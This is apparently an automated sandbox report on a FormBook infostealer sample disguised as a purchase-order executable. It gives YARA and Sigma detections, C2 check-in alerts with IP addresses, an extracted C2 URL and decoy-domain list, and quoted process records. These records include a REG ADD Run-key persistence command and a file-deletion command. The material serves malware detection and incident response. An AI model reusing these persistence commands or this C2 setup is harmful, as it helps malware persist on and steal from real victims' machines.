0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xdc0d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xdc352:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfc0f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfc372:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe7e85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x107ea5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe7971:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x107991:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe7f87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x107fa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe80ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10811f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xdcd6a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xfcd8a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xe6bec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x106c0c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xdda63:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xfda83:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xee0d7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10e0f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xef0da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xeaff9:$sqlite3step: 68 34 1C 7B E1 0xeb10c:$sqlite3step: 68 34 1C 7B E1 0x10b019:$sqlite3step: 68 34 1C 7B E1 0x10b12c:$sqlite3step: 68 34 1C 7B E1 0xeb028:$sqlite3text: 68 38 2A 90 C5 0xeb14d:$sqlite3text: 68 38 2A 90 C5 0x10b048:$sqlite3text: 68 38 2A 90 C5 0x10b16d:$sqlite3text: 68 38 2A 90 C5 0xeb03b:$sqlite3blob: 68 53 D8 7F 8C 0xeb163:$sqlite3blob: 68 53 D8 7F 8C 0x10b05b:$sqlite3blob: 68 53 D8 7F 8C 0x10b183:$sqlite3blob: 68 53 D8 7F 8C
7.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
7.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bda0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
7.2.RegAsm.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab07:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.RegAsm.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a29:$sqlite3step: 68 34 1C 7B E1 0x17b3c:$sqlite3step: 68 34 1C 7B E1 0x17a58:$sqlite3text: 68 38 2A 90 C5 0x17b7d:$sqlite3text: 68 38 2A 90 C5 0x17a6b:$sqlite3blob: 68 53 D8 7F 8C 0x17b93:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: CMSTP Execution Process Creation

Source: Process started

Author: Nik Seetharaman: Data: Command: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", CommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\cmstp.exe", ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5552, ParentProcessName: cmstp.exe, ProcessCommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ProcessId: 5536, ProcessName: cmd.exe

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 1824, ProcessName: rundll32.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3984, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PURCHASED ORDER OF ENG091

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6332, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif", ProcessId: 3984, ProcessName: reg.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" , CommandLine: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" , CommandLine|base64offset|contains: 9, Image: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif, NewProcessName: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif, OriginalFileName: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" , ProcessId: 5728, ProcessName: PURCHASED ORDER OF ENG091.pif

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif", CommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe", ParentImage: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe, ParentProcessId: 3472, ParentProcessName: PURCHASED ORDER OF ENG091.exe, ProcessCommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif", ProcessId: 6332, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T11:30:00.590964+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49882	192.243.59.20	80	TCP
2024-10-08T11:30:00.590964+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49992	34.205.242.146	80	TCP
2024-10-08T11:31:25.738802+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49995	104.21.93.17	80	TCP
2024-10-08T11:31:46.050662+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	50000	91.195.240.19	80	TCP
2024-10-08T11:32:29.382087+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	50006	3.33.130.190	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PURCHASED ORDER OF ENG091.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Avira: detection malicious, Label: HEUR/AGEN.1305452
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	Avira: detection malicious, Label: HEUR/AGEN.1305452
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Avira: detection malicious, Label: HEUR/AGEN.1305452
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Avira: detection malicious, Label: HEUR/AGEN.1305452
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Avira: detection malicious, Label: HEUR/AGEN.1305452

Found malware configuration

Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.cnoszirzbkaqz.com/btrd/"], "decoy": ["everslane.com", "prairieviewelectric.online", "dszvhgd.com", "papamuch.com", "8129k.vip", "jeffreestar.gold", "bestguestrentals.com", "nvzhuang1.net", "anangtoto.com", "yxfgor.top", "practicalpoppers.com", "thebestanglephotography.online", "koormm.top", "criika.net", "audioflow.online", "380747.net", "jiuguanwang.net", "bloxequities.com", "v321c.com", "sugar.monster", "agriwithai.com", "rd8.online", "texanboxes.com", "h7wlvwr4afx.top", "furryfriendsupply.store", "xmentorgroup.com", "runccl.com", "fairplaytavern.com", "concretecountertopsolutios.com", "wzxq.xyz", "outletivo.com", "studyasp.net", "pure1027.com", "xpffvn.cfd", "liposuctionclinics2.today", "rouchoug.top", "rifasgados.com", "tesourosobrerodas.site", "1stclasstv.net", "invest247on.com", "watch2movie.xyz", "martline.website", "naddafornadda.com", "drbtcbtc.com", "turbrun.com", "autounion999370.top", "wirewizardselectric.net", "0757hunyin.net", "researchforhighschool.com", "thedivorcesurvivalguide.com", "emeraldsurrogatefabric.com", "home-repair-contractors-kfm.xyz", "onlynaturlpt.shop", "agiletzal.site", "dylanmoranrules.com", "ngbbvuhkm5.asia", "proveedorafrac.com", "pho3nixkidsghana.com", "greatfightcompany.com", "hotnerdsg.com", "thecolourgrey.com", "librarylatte.com", "videomademagic.com", "coinrun.net"]}

Multi AV Scanner detection for domain / URL

Source: www.emeraldsurrogatefabric.com	Virustotal: Detection: 8%	Perma Link
Source: http://www.emeraldsurrogatefabric.com	Virustotal: Detection: 8%	Perma Link
Source: http://www.martline.website/btrd/	Virustotal: Detection: 15%	Perma Link
Source: www.cnoszirzbkaqz.com/btrd/	Virustotal: Detection: 6%	Perma Link
Source: http://www.emeraldsurrogatefabric.com/btrd/	Virustotal: Detection: 8%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	ReversingLabs: Detection: 60%
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	ReversingLabs: Detection: 60%
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	ReversingLabs: Detection: 60%
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	ReversingLabs: Detection: 60%
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: PURCHASED ORDER OF ENG091.exe	ReversingLabs: Detection: 60%
Source: PURCHASED ORDER OF ENG091.exe	Virustotal: Detection: 63%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PURCHASED ORDER OF ENG091.exe

Joe Sandbox ML: detected

Source: PURCHASED ORDER OF ENG091.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PURCHASED ORDER OF ENG091.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: chkdsk.pdbGCTL source: RegAsm.exe, 00000045.00000002.2892603642.0000000001380000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000046.00000002.2895393793.0000000000130000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmstp.pdbGCTL source: RegAsm.exe, 00000007.00000002.2235793612.0000000001540000.00000040.10000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3365281971.0000000000220000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdb source: RegAsm.exe, 00000013.00000002.2357394928.0000000001720000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367071175.0000000000370000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msdt.pdbGCTL source: RegAsm.exe, 0000001B.00000002.2433869260.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436801979.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, msdt.exe, 00000025.00000002.2526883807.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824411296.0000000000E80000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netsh.pdb source: RegAsm.exe, 0000004D.00000002.3028255621.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 0000004E.00000002.3033972586.0000000000A60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\password_generator-master\obj\Debug\Aewlani.pdb source: PURCHASED ORDER OF ENG091.exe, 00000000.00000000.2119834627.0000000000442000.00000002.00000001.01000000.00000003.sdmp, cmd.exe, 00000005.00000003.2161957449.00000000032E5000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2315915569.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000003.2390659515.0000000003086000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000022.00000003.2479534553.0000000002695000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002A.00000003.2596807840.0000000003135000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000032.00000003.2684351983.00000000032E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000003A.00000003.2769484455.0000000002905000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000043.00000003.2848660519.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000004B.00000003.2975731288.00000000035E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: RegAsm.exe, 00000013.00000002.2357394928.0000000001720000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367071175.0000000000370000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: chkdsk.pdb source: RegAsm.exe, 00000045.00000002.2892603642.0000000001380000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000046.00000002.2895393793.0000000000130000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.2237767546.0000000004599000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.3366809069.0000000004740000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.2235631145.00000000043E5000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.3366809069.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000003.2357315746.0000000004B0F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000003.2364128162.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367516642.000000000500E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367516642.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436864306.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436864306.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000003.2432746712.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000001C.00000003.2435053187.0000000004854000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000025.00000002.2527278356.000000000502E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000025.00000002.2527278356.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000025.00000003.2522733065.0000000004AEF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000025.00000003.2524932833.0000000004CDC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.2644284547.00000000046C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.2647610865.0000000004879000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2649407934.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2649407934.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000003.2729298239.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732895661.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732895661.0000000002E7E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000003.2727219080.0000000002985000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000003E.00000003.2815565973.0000000004B43000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824847586.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824847586.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000003E.00000003.2812512464.0000000004999000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000046.00000003.2893566375.00000000056D8000.00000004.00000020.00020000.00000
Source:	Binary string: RegAsm.pdb source: explorer.exe, 00000008.00000002.3389406505.0000000010A9F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3367455817.0000000004C8F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3365692981.000000000293B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netsh.pdbGCTL source: RegAsm.exe, 0000004D.00000002.3028255621.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 0000004E.00000002.3033972586.0000000000A60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.2237767546.0000000004599000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.3366809069.0000000004740000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.2235631145.00000000043E5000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.3366809069.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000003.2357315746.0000000004B0F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000003.2364128162.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367516642.000000000500E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367516642.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436864306.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436864306.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000003.2432746712.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000001C.00000003.2435053187.0000000004854000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000025.00000002.2527278356.000000000502E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000025.00000002.2527278356.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000025.00000003.2522733065.0000000004AEF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000025.00000003.2524932833.0000000004CDC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.2644284547.00000000046C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.2647610865.0000000004879000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2649407934.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2649407934.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000003.2729298239.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732895661.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732895661.0000000002E7E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000003.2727219080.0000000002985000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000003E.00000003.2815565973.0000000004B43000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824847586.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824847586.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000003E.00000003.2812512464.0000000004999000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000046.00000003.2893566375.00000000056D8000.00000004.00000020.00020
Source:	Binary string: rundll32.pdb source: RegAsm.exe, 0000002C.00000002.2646537881.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2648985101.0000000000270000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: RegAsm.exe, 00000034.00000002.2729173666.0000000002940000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732547455.0000000000960000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegAsm.exe, 0000002C.00000002.2646537881.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2648985101.0000000000270000.00000040.80000000.00040000.00000000.sdmp
